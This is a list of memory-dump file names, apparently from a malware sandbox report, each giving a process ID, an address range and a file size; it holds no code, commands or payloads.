memory/1888-1936-0x0000000007A80000-0x0000000007A8E000-memory.dmpFilesize
56KB
-
memory/1888-1930-0x0000000008010000-0x000000000868A000-memory.dmpFilesize
6.5MB
-
memory/1888-1919-0x000000006F7F0000-0x000000006FB47000-memory.dmpFilesize
3.3MB
-
memory/1888-1929-0x00000000078A0000-0x0000000007944000-memory.dmpFilesize
656KB
-
memory/1888-1938-0x0000000007AE0000-0x0000000007AFA000-memory.dmpFilesize
104KB
-
memory/1888-1928-0x0000000007880000-0x000000000789E000-memory.dmpFilesize
120KB
-
memory/1888-1939-0x0000000007B00000-0x0000000007B08000-memory.dmpFilesize
32KB
-
memory/2060-233-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/2060-230-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/2060-231-0x0000000000400000-0x0000000000643000-memory.dmpFilesize
2.3MB
-
memory/2144-199-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2144-455-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/2324-534-0x0000000005250000-0x000000000529C000-memory.dmpFilesize
304KB
-
memory/2324-532-0x0000000004920000-0x0000000004C77000-memory.dmpFilesize
3.3MB
-
memory/2476-317-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/2476-320-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/2564-394-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/2564-930-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/2564-472-0x0000000010000000-0x00000000105E8000-memory.dmpFilesize
5.9MB
-
memory/2564-1501-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/2704-228-0x0000000000290000-0x0000000000DE1000-memory.dmpFilesize
11.3MB
-
memory/2704-1004-0x0000000000290000-0x0000000000DE1000-memory.dmpFilesize
11.3MB
-
memory/2704-512-0x0000000000290000-0x0000000000DE1000-memory.dmpFilesize
11.3MB
-
memory/2704-456-0x0000000000290000-0x0000000000DE1000-memory.dmpFilesize
11.3MB
-
memory/2704-576-0x0000000000290000-0x0000000000DE1000-memory.dmpFilesize
11.3MB
-
memory/2856-1184-0x0000000004BB0000-0x0000000004F07000-memory.dmpFilesize
3.3MB
-
memory/2868-1505-0x0000000000C50000-0x00000000012D0000-memory.dmpFilesize
6.5MB
-
memory/2868-1010-0x0000000000C50000-0x00000000012D0000-memory.dmpFilesize
6.5MB
-
memory/2956-454-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2956-350-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2956-375-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2956-575-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2956-510-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2956-223-0x0000000000400000-0x0000000000E08000-memory.dmpFilesize
10.0MB
-
memory/2964-3-0x00007FFD18180000-0x00007FFD1823D000-memory.dmpFilesize
756KB
-
memory/2964-68-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/2964-141-0x00007FFD1819A000-0x00007FFD1819B000-memory.dmpFilesize
4KB
-
memory/2964-150-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/2964-348-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/2964-167-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/2964-2-0x00007FFD18180000-0x00007FFD1823D000-memory.dmpFilesize
756KB
-
memory/2964-1-0x00007FFD1819A000-0x00007FFD1819B000-memory.dmpFilesize
4KB
-
memory/2964-0-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/2964-98-0x0000000140000000-0x0000000140889000-memory.dmpFilesize
8.5MB
-
memory/3452-469-0x0000000007CD0000-0x0000000007D20000-memory.dmpFilesize
320KB
-
memory/3452-489-0x0000000008330000-0x00000000084F2000-memory.dmpFilesize
1.8MB
-
memory/3452-368-0x0000000006F10000-0x0000000006F5C000-memory.dmpFilesize
304KB
-
memory/3452-367-0x0000000006DA0000-0x0000000006DDC000-memory.dmpFilesize
240KB
-
memory/3452-343-0x00000000065B0000-0x0000000006626000-memory.dmpFilesize
472KB
-
memory/3452-304-0x0000000005E80000-0x0000000006426000-memory.dmpFilesize
5.6MB
-
memory/3452-490-0x0000000009E70000-0x000000000A39C000-memory.dmpFilesize
5.2MB
-
memory/3452-358-0x0000000006C70000-0x0000000006C8E000-memory.dmpFilesize
120KB
-
memory/3452-305-0x00000000059B0000-0x0000000005A42000-memory.dmpFilesize
584KB
-
memory/3452-313-0x0000000005990000-0x000000000599A000-memory.dmpFilesize
40KB
-
memory/3452-365-0x0000000006D40000-0x0000000006D52000-memory.dmpFilesize
72KB
-
memory/3452-238-0x0000000000400000-0x0000000000452000-memory.dmpFilesize
328KB
-
memory/3452-363-0x00000000072B0000-0x00000000078C8000-memory.dmpFilesize
6.1MB
-
memory/3452-364-0x0000000006E00000-0x0000000006F0A000-memory.dmpFilesize
1.0MB
-
memory/3552-1437-0x00000000046F0000-0x0000000004A47000-memory.dmpFilesize
3.3MB
-
memory/3552-1438-0x0000000004B80000-0x0000000004BCC000-memory.dmpFilesize
304KB
-
memory/3972-488-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/3972-349-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/3972-536-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/3972-867-0x0000000000400000-0x0000000000678000-memory.dmpFilesize
2.5MB
-
memory/4508-662-0x0000000005F30000-0x00000000060C2000-memory.dmpFilesize
1.6MB
-
memory/4508-667-0x0000000005BB0000-0x0000000005BC0000-memory.dmpFilesize
64KB
-
memory/4508-226-0x0000000000E30000-0x0000000001268000-memory.dmpFilesize
4.2MB
-
memory/4508-227-0x0000000005C70000-0x0000000005D0C000-memory.dmpFilesize
624KB
-
memory/4608-306-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-458-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-514-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-267-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-315-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-314-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-882-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-265-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-266-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-264-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4608-307-0x0000000000A30000-0x0000000000FFB000-memory.dmpFilesize
5.8MB
-
memory/4736-450-0x0000000006060000-0x000000000607A000-memory.dmpFilesize
104KB
-
memory/4736-418-0x00000000055A0000-0x0000000005606000-memory.dmpFilesize
408KB
-
memory/4736-449-0x0000000006B20000-0x0000000006BB6000-memory.dmpFilesize
600KB
-
memory/4736-453-0x00000000060B0000-0x00000000060D2000-memory.dmpFilesize
136KB
-
memory/4736-413-0x0000000002360000-0x0000000002396000-memory.dmpFilesize
216KB
-
memory/4736-434-0x0000000005B70000-0x0000000005B8E000-memory.dmpFilesize
120KB
-
memory/4736-416-0x0000000004E40000-0x000000000546A000-memory.dmpFilesize
6.2MB
-
memory/4736-428-0x00000000056F0000-0x0000000005A47000-memory.dmpFilesize
3.3MB
-
memory/4736-419-0x0000000005680000-0x00000000056E6000-memory.dmpFilesize
408KB
-
memory/4736-417-0x0000000005500000-0x0000000005522000-memory.dmpFilesize
136KB
-
memory/4916-217-0x0000028A1BC30000-0x0000028A1BC44000-memory.dmpFilesize
80KB
-
memory/4916-263-0x0000028A36C80000-0x0000028A36CF6000-memory.dmpFilesize
472KB
-
memory/4916-234-0x0000028A1D930000-0x0000028A1D93A000-memory.dmpFilesize
40KB
-
memory/4916-236-0x0000028A36BB0000-0x0000028A36BBA000-memory.dmpFilesize
40KB
-
memory/4916-235-0x0000028A36BC0000-0x0000028A36BD2000-memory.dmpFilesize
72KB
-
memory/4916-353-0x0000028A36C50000-0x0000028A36C6E000-memory.dmpFilesize
120KB
-
memory/4920-1265-0x0000000000700000-0x0000000000D80000-memory.dmpFilesize
6.5MB
-
memory/4920-1862-0x0000000000700000-0x0000000000D80000-memory.dmpFilesize
6.5MB
-
memory/5200-1079-0x00000000044E0000-0x0000000004837000-memory.dmpFilesize
3.3MB
-
memory/5200-1081-0x0000000004AC0000-0x0000000004B0C000-memory.dmpFilesize
304KB
-
memory/5280-1027-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/5280-1266-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/5464-1536-0x0000000005170000-0x00000000054C7000-memory.dmpFilesize
3.3MB
-
memory/5464-1537-0x0000000005770000-0x00000000057BC000-memory.dmpFilesize
304KB
-
memory/5532-1022-0x0000000005900000-0x000000000594C000-memory.dmpFilesize
304KB
-
memory/5532-1013-0x0000000004E90000-0x00000000051E7000-memory.dmpFilesize
3.3MB
-
memory/5696-582-0x0000028D76490000-0x0000028D764B2000-memory.dmpFilesize
136KB
-
memory/5948-1999-0x0000000006150000-0x000000000619C000-memory.dmpFilesize
304KB
-
memory/6056-519-0x0000000010000000-0x00000000105E8000-memory.dmpFilesize
5.9MB
-
memory/6056-494-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/6056-1012-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB
-
memory/6056-1011-0x00000000007A0000-0x0000000000E20000-memory.dmpFilesize
6.5MB